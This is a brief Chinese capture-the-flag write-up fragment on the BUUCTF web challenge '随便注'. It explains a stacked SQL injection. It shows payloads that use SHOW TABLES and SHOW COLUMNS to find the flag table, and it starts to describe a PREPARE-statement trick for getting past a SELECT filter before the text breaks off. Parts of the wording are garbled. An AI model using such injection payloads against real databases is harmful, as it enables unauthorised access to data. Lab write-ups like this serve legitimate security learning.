buucrf-web-随便注

又学到个姿式 这道题是sql堆叠注入 堆叠注入自行百度node 同时有过滤 咱们首先经过show语句肯定了flag在哪一个表里mysql ?inject=1';show tables;# ?inject=1';show columns from `1919810931114514`;# 可是问题在于不能使用select等查询 作法是使用mysql预约义语句web PREPARE stmt from
相关文章
相关标签/搜索